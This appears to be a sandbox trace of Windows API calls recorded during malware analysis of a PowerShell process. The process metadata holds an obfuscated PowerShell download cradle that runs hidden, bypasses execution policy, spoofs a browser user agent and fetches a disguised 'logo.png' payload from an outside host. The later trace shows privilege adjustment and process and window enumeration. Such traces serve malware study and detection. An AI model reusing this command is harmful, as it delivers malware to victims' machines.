	[0121.474] GetProcessHeap () returned 0xd0000
	[0121.474] HeapFree (in: hHeap=0xd0000, dwFlags=0x0, lpMem=0xebb10 | out: hHeap=0xd0000) returned 1
	[0121.474] GetEnvironmentStringsW () returned 0xeb8d0*
	[0121.474] GetProcessHeap () returned 0xd0000
	[0121.474] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0xb2c) returned 0xec820
	[0121.474] FreeEnvironmentStringsW (penv=0xeb8d0) returned 1
	[0121.474] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) 

Process:
	id = "40"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x12b7a000"
	os_pid = "0xc54"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "37"
	os_parent_pid = "0x8c0"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 318
	os_tid = 0xc58

	[0123.436] strcmp (_Str1="EEHeapAllocInProcessHeap", _Str2="CLRLoadLibraryEx") returned 1
	[0124.022] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0125.168] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0125.168] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0125.168] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0125.168] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0125.764] AtlComPtrAssign () 
	[0126.155] GetVersionExW (in: lpVersionInformation=0x1bde30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1bde30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0126.157] GetVersionExW (in: lpVersionInformation=0x1bde30*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1bde30*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0126.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0126.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0126.310] GetVersionExW (in: lpVersionInformation=0x1bdba0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1bdba0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0126.311] SetErrorMode (uMode=0x1) returned 0x1
	[0126.312] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1bdd00 | out: lpFileInformation=0x1bdd00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0126.313] SetErrorMode (uMode=0x1) returned 0x1
	[0126.316] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1bdf70 | out: lpdwHandle=0x1bdf70) returned 0x94c
	[0126.318] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cd7370 | out: lpData=0x2cd7370) returned 1
	[0126.320] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1bdee8, puLen=0x1bdee0 | out: lplpBuffer=0x1bdee8*=0x2cd740c, puLen=0x1bdee0) returned 1
	[0126.322] lstrlenW (lpString="䅁") returned 1
	[0126.331] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1bde58, puLen=0x1bde50 | out: lplpBuffer=0x1bde58*=0x2cd74e8, puLen=0x1bde50) returned 1
	[0126.331] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0126.333] CoTaskMemAlloc (cb=0x2e) returned 0x2f85f0
	[0126.333] lstrcpyW (in: lpString1=0x2f85f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0126.334] CoTaskMemFree (pv=0x2f85f0) 
	[0126.334] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1bde58, puLen=0x1bde50 | out: lplpBuffer=0x1bde58*=0x2cd753c, puLen=0x1bde50) returned 1
	[0126.334] lstrlenW (lpString="System.Management.Automation") returned 28
	[0126.334] CoTaskMemAlloc (cb=0x3c) returned 0x2adc70
	[0126.334] lstrcpyW (in: lpString1=0x2adc70, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0126.334] CoTaskMemFree (pv=0x2adc70) 
	[0126.334] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1bde58, puLen=0x1bde50 | out: lplpBuffer=0x1bde58*=0x2cd7598, puLen=0x1bde50) returned 1
	[0126.334] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0126.334] CoTaskMemAlloc (cb=0x20) returned 0x2fe780
	[0126.334] lstrcpyW (in: lpString1=0x2fe780, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0126.334] CoTaskMemFree (pv=0x2fe780) 
	[0126.334] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1bde58, puLen=0x1bde50 | out: lplpBuffer=0x1bde58*=0x2cd75d8, puLen=0x1bde50) returned 1
	[0126.334] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0126.334] CoTaskMemAlloc (cb=0x44) returned 0x2adc70
	[0126.334] lstrcpyW (in: lpString1=0x2adc70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0126.335] CoTaskMemFree (pv=0x2adc70) 
	[0126.335] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1bde58, puLen=0x1bde50 | out: lplpBuffer=0x1bde58*=0x2cd7640, puLen=0x1bde50) returned 1
	[0126.335] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0126.335] CoTaskMemAlloc (cb=0x76) returned 0x29df00
	[0126.335] lstrcpyW (in: lpString1=0x29df00, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0126.335] CoTaskMemFree (pv=0x29df00) 
	[0126.335] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1bde58, puLen=0x1bde50 | out: lplpBuffer=0x1bde58*=0x2cd76dc, puLen=0x1bde50) returned 1
	[0126.335] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0126.335] CoTaskMemAlloc (cb=0x44) returned 0x2adc70
	[0126.335] lstrcpyW (in: lpString1=0x2adc70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0126.335] CoTaskMemFree (pv=0x2adc70) 
	[0126.335] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1bde58, puLen=0x1bde50 | out: lplpBuffer=0x1bde58*=0x2cd7740, puLen=0x1bde50) returned 1
	[0126.335] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0126.335] CoTaskMemAlloc (cb=0x58) returned 0x25d540
	[0126.335] lstrcpyW (in: lpString1=0x25d540, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0126.335] CoTaskMemFree (pv=0x25d540) 
	[0126.335] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1bde58, puLen=0x1bde50 | out: lplpBuffer=0x1bde58*=0x2cd77bc, puLen=0x1bde50) returned 1
	[0126.335] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0126.335] CoTaskMemAlloc (cb=0x20) returned 0x2fe780
	[0126.335] lstrcpyW (in: lpString1=0x2fe780, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0126.335] CoTaskMemFree (pv=0x2fe780) 
	[0126.335] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1bde58, puLen=0x1bde50 | out: lplpBuffer=0x1bde58*=0x2cd7464, puLen=0x1bde50) returned 1
	[0126.335] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0126.335] CoTaskMemAlloc (cb=0x66) returned 0x2fcd80
	[0126.335] lstrcpyW (in: lpString1=0x2fcd80, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0126.335] CoTaskMemFree (pv=0x2fcd80) 
	[0126.335] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1bde58, puLen=0x1bde50 | out: lplpBuffer=0x1bde58*=0x0, puLen=0x1bde50) returned 0
	[0126.335] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1bde58, puLen=0x1bde50 | out: lplpBuffer=0x1bde58*=0x0, puLen=0x1bde50) returned 0
	[0126.335] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1bde58, puLen=0x1bde50 | out: lplpBuffer=0x1bde58*=0x0, puLen=0x1bde50) returned 0
	[0126.335] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1bde28, puLen=0x1bde20 | out: lplpBuffer=0x1bde28*=0x2cd740c, puLen=0x1bde20) returned 1
	[0126.336] CoTaskMemAlloc (cb=0x204) returned 0x298bd0
	[0126.336] VerLanguageNameW (in: wLang=0x0, szLang=0x298bd0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0126.337] CoTaskMemFree (pv=0x298bd0) 
	[0126.337] VerQueryValueW (in: pBlock=0x2cd7370, lpSubBlock="\\", lplpBuffer=0x1bde78, puLen=0x1bde70 | out: lplpBuffer=0x1bde78*=0x2cd7398, puLen=0x1bde70) returned 1
	[0126.343] GetCurrentProcessId () returned 0xc54
	[0126.569] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1bcda0 | out: lpLuid=0x1bcda0*(LowPart=0x14, HighPart=0)) returned 1
	[0126.572] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1bcdc0 | out: TokenHandle=0x1bcdc0*=0x2f0) returned 1
	[0126.573] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2cdabe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0126.583] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2cdac50, cb=0x200, lpcbNeeded=0x1bddd8 | out: lphModule=0x2cdac50, lpcbNeeded=0x1bddd8) returned 1
	[0126.586] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13ff20000, lpmodinfo=0x2cdaec0, cb=0x18 | out: lpmodinfo=0x2cdaec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0126.587] CoTaskMemAlloc (cb=0x804) returned 0x300d00
	[0126.587] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13ff20000, lpBaseName=0x300d00, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0126.587] CoTaskMemFree (pv=0x300d00) 
	[0126.588] CoTaskMemAlloc (cb=0x804) returned 0x300d00
	[0126.588] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13ff20000, lpFilename=0x300d00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0126.588] CoTaskMemFree (pv=0x300d00) 
	[0126.589] CloseHandle (hObject=0x2f0) returned 1
	[0126.597] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0
	[0126.598] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x1bdf08 | out: lpExitCode=0x1bdf08*=0x103) returned 1
	[0126.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cdb088, Length=0x20000, ResultLength=0x1bded0 | out: SystemInformation=0x12cdb088, ResultLength=0x1bded0*=0x13638) returned 0x0
	[0126.785] EnumWindows (lpEnumFunc=0x2c566ac, lParam=0x0) returned 1
	[0126.786] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.786] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.786] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.786] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x334
	[0126.786] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x324
	[0126.786] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.786] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.787] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.787] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.787] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.787] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.787] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.787] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.787] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.787] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x45c
	[0126.787] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.787] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.787] GetWindowThreadProcessId (in: hWnd=0x202a8, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xa38
	[0126.787] GetWindowThreadProcessId (in: hWnd=0x30290, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xc70
	[0126.788] GetWindowThreadProcessId (in: hWnd=0x10282, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x7dc
	[0126.788] GetWindowThreadProcessId (in: hWnd=0xb0184, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xc08
	[0126.788] GetWindowThreadProcessId (in: hWnd=0x40240, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x728
	[0126.788] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x914
	[0126.788] GetWindowThreadProcessId (in: hWnd=0xa022e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x9ec
	[0126.788] GetWindowThreadProcessId (in: hWnd=0x1401b2, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x610
	[0126.788] GetWindowThreadProcessId (in: hWnd=0x60192, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xb5c
	[0126.788] GetWindowThreadProcessId (in: hWnd=0x60230, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xbdc
	[0126.788] GetWindowThreadProcessId (in: hWnd=0x30234, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x8f0
	[0126.788] GetWindowThreadProcessId (in: hWnd=0x800aa, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xb8c
	[0126.788] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x5e0
	[0126.788] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x90
	[0126.789] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.789] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.789] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.789] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.789] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.789] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.789] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.789] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.789] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x840
	[0126.789] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x844
	[0126.789] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x46c
	[0126.789] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xb40
	[0126.790] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x914
	[0126.790] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x988
	[0126.790] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x914
	[0126.790] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x950
	[0126.790] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x914
	[0126.790] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x914
	[0126.790] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x868
	[0126.790] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x850
	[0126.790] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x830
	[0126.790] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x814
	[0126.790] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x744
	[0126.790] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x2a8
	[0126.791] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x534
	[0126.791] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x5e4
	[0126.791] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x5c4
	[0126.791] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x58c
	[0126.791] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x238
	[0126.791] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x584
	[0126.791] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x7e8
	[0126.791] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x678
	[0126.791] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x35c
	[0126.791] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x51c
	[0126.791] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x360
	[0126.791] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x274
	[0126.792] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x588
	[0126.792] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xc8
	[0126.792] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x21c
	[0126.792] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x5ec
	[0126.792] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x334
	[0126.792] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x664
	[0126.792] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x334
	[0126.792] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x664
	[0126.792] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x334
	[0126.792] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x5ec
	[0126.792] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x5ec
	[0126.792] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x550
	[0126.793] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x7a0
	[0126.793] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x594
	[0126.793] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x564
	[0126.793] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x45c
	[0126.793] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x548
